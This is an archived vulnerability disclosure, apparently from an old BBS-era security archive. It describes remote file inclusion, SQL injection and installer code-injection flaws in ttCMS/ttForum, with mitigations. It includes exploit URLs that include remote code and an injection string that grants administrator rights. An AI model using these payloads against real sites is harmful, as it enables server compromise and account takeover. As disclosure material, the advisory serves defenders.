Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: etc :: ttcms.txt

ttCMS / ttForum exploits






hope this is the right place to send this exploit info, I found three 
diffrent exploits for a forum software / cms software:
--------------------------------------------------------------------------
----------------------------------------------------------------------

Affected Product: ttCMS or ttForum
Affected Versions: ttCMS 2.2, (possibly more) all versions of ttForum.

Description of exploit:
Open up modules/forum/News.php (ttCMS) or News.php (ttForum).
As you can see, this line:
include($template . '.' . $ext);
Includes a file directly from the user input.

Here's an example exploit URL:
<http://www.yourserver.com/ttforum/index.php>?
action=news;board=1;template=http://www.yourserver.com/modules/forum/helpa
dmin;ext=help

As you can see, it's possible to execute remote code using this hole.

Possible solutions:
Install YaBB SE 1.5.2. While ttForum is a derivative of YaBB SE, this 
hole does not exist there.
Upgrade to a newer version of ttForum/ttCMS that fixes the hole. (none 
is yet available.)
Use a different forum and/or CMS software.

--------------------------------------------------------------------------
----------------------------------------------------------------------

Affected Product: ttCMS or ttForum
Affected Versions: ttCMS 2.2, (possibly more) all versions of ttForum.

Description of exploit:
Open up modules/forum/src/Profile.php (ttCMS) or src/Profile.php 
(ttForum).
As you can see, this line:
foreach ($HTTP_POST_VARS as $key => $value) {
$member[$key] = str_replace(array('&', '"', '<', '>'), array
('&amp;', '&quot;', '&lt;', '&gt;'), trim($value));
Parses out ", <, >, and &. It, however, does not parse out a SINGLE 
quote.

Now scroll down.
SET $queryPasswdPart $customTitlePart realName='$member[name]', 

As you can see, simply setting your name to "me' 
memberGroup='Administrator" would make you an Administrator on any server 
that had magic_quotes_gpc off.

As you can see from the php.ini-recommended file:
; - magic_quotes_gpc = Off [Performance]

They recommend it off, and thus a multitude of servers have it off, 
enabling this hole.

Possible solutions:
Install YaBB SE 1.5.2. While ttForum is a derivative of YaBB SE, this 
hole does not exist there.
Upgrade to a newer version of ttForum/ttCMS that fixes the hole. (none 
is yet available.)
Use a different forum and/or CMS software.

--------------------------------------------------------------------------
----------------------------------------------------------------------

Title: ttForum / ttCMS, remote command execution.
Application: ttForum up to 1.1, ttCMS 2.2Platform(s): Unix 
Technical description:
----------------------
Everybody can inject PHP code in ttForum/ttCMS through the 
ttForumInstaller. The Installer (which can be found in 
the /modules/forumdirectory in ttCMS) includes the Forum-Settings 
throughinclude("$installdir/Settings.php") where $installdir istaken from 
a Form.In order to exploit this vulnerability, all you have to do is 
tocreate a File "Settings.php" on your own webserver which containsthe 
code you want to execute on the target-system. If you now callthe 
install.php-File with the following parameters:http://target-
system/install.php?step=7&installdir=http://yourserver/the code in 
Settings.php will be injected.

Recommendations:
----------------
Delete install.php AS SOON AS POSSIBLE or use YaBB SE 1.5.2 (ttForumis a 
derivate of YaBB SE)



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH